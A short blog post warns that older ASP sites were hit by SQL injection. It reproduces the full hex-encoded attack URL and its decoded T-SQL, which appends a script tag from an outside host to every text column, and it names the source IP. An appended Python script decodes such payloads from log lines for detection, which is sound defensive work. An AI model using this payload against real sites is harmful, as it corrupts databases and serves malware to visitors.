Work sites attacked



Just an FYI – some of our old sites are not filtering out injection attacks and got hosed last weekend. The attack seems fairly sophisticated (imo) and is described in this post.

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300029002000420045004700490 04E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

If you just copy the hex value from this URL, as this…

0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200

And convert this to ASCII (you can convert hex to ASCII); I got this…

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted, using table cursors, into each column in the table. If you read the code you can see how each table in the entire database will be affected by this.

The source of this came from 219.153.46.28 (28.46.153.219.broad.cq.cq.dynamic.163data.com.cn); the agent is Indy Library, a Chinese bot. The agent Indy Library should be blocked entirely.

Our attacks were similar and also came from [219.153.46.28].

——————–

If you’ve got crappy/insecure code out there – be warned.
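Decoding the payload from the URL above, as an added example that is not part of the original post or the quoted one: the hex inside CAST(0x… AS NVARCHAR(4000)) is UTF-16LE, SQL Server's NVARCHAR encoding, which is why every character in the dump is followed by 00 (a VARCHAR literal would be single-byte text). The script below extracts such literals from a request string or a web-server log line, chooses the encoding from whether the target type is NVARCHAR or VARCHAR, and pulls out the script src the payload appends to every text column. Only the payload hex comes from the page; the log lines and the short VARCHAR variant are constructed for illustration.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# The attack URL quoted in the post, with the page's hex payload joined back into
# one string. The "%20@S" fragments are the @S variable the page's extraction mangled.
ATTACK_URL = (
    "orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000"
    "4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055"
    "00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900"
    "73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069"
    "006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000"
    "62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031"
    "0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00"
    "200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043"
    "0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00"
    "27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C"
    "005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00"
    "6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045"
    "00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000"
    "43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075"
    "00720073006F007200"
    "%20AS%20NVARCHAR(4000));EXEC(@S);--"
)

# CAST(0x<hex> AS [N]VARCHAR ...): the captured "N" decides how the bytes are decoded.
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=['\"]?([^'\">\s]+)", re.IGNORECASE)


def decode_hex_sql(request: str) -> List[str]:
    """Return the SQL hidden in every CAST(0x... AS [N]VARCHAR) literal of a request string."""
    text = unquote(request)  # turn %20 back into spaces so the regex sees "AS NVARCHAR"
    found = []
    for hexstr, n_prefix in HEX_CAST_RE.findall(text):
        if len(hexstr) % 2:  # an odd number of hex digits cannot be a byte string
            continue
        raw = bytes.fromhex(hexstr)
        # NVARCHAR is UTF-16LE on SQL Server (0x4400 = 'D'); VARCHAR is single-byte text.
        encoding = "utf-16-le" if n_prefix.upper() == "N" else "latin-1"
        found.append(raw.decode(encoding, errors="replace"))
    return found


def injected_script_src(sql: str) -> Optional[str]:
    """Pull the URL of the <script src=...> tag the decoded payload appends to each column."""
    m = SCRIPT_SRC_RE.search(sql)
    return m.group(1) if m else None


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, Optional[str]]]:
    """Flag log lines carrying hex-encoded SQL; returns (line_no, decoded_sql, script_src)."""
    hits = []
    for no, line in enumerate(lines, start=1):
        for sql in decode_hex_sql(line):
            hits.append((no, sql, injected_script_src(sql)))
    return hits


# Constructed IIS-style log lines (not from the post): a benign request, the page's
# payload, and a VARCHAR variant whose hex 0x73656C6563742031 is just "select 1".
SAMPLE_LOG = [
    "2008-05-20 03:12:01 GET /orderitem.asp IT=GM-204 80 - 10.0.0.5 Mozilla/4.0 200",
    "2008-05-20 03:12:09 GET /orderitem.asp " + ATTACK_URL.split("?", 1)[1]
    + " 80 - 219.153.46.28 Mozilla/3.0+(compatible;+Indy+Library) 200",
    "2008-05-20 03:12:10 GET /orderitem.asp IT=1;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x73656C6563742031%20AS%20VARCHAR(4000));EXEC(@S);--"
    " 80 - 219.153.46.28 Mozilla/3.0+(compatible;+Indy+Library) 200",
]

if __name__ == "__main__":
    for no, sql, src in scan_log_lines(SAMPLE_LOG):
        print(f"line {no}: script src={src}")
        print("  " + sql)
```

Run as-is it prints the two flagged lines with the fully decoded T-SQL, so the cursor over sysobjects/syscolumns and the appended script tag can be read without hand-converting hex; point scan_log_lines at real log lines to find the same pattern in your own traffic.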

Published by in geek using 223 words.
